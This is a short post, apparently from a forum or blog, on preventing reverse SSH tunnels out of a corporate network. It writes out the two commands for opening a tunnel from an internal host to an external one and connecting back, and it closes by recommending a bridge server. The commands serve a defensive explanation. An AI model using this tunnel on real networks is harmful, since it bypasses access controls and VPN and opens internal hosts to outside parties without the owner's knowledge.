Can we prevent establishing of reverse SSH tunnel between corporate network and a public domain system?
If I can establish an SSH connection from a corporate internal host to the external host using –R option to open port 2222 on the external host back to port 22 on the internal system, then the external host can connect back into internal host.
1. internal$ ssh -R 2222:127.0.0.1:22 external.example.ext
2. external$ ssh -p 2222 127.0.0.1
Here I am establishing a tunnel inside another one, completely bypassing all access restriction and VPN requirements. This type of connection will allow establishing an external gateway to the internal host without the knowledge of the corporate network. The external gateway will control all the traffic to the internal network.
The best way to restrict these kinds of activities is to have a bridge server in the corporate network from which a remote user can SSH to any internal servers. No user should be able to SSH directly to or from the corporate network.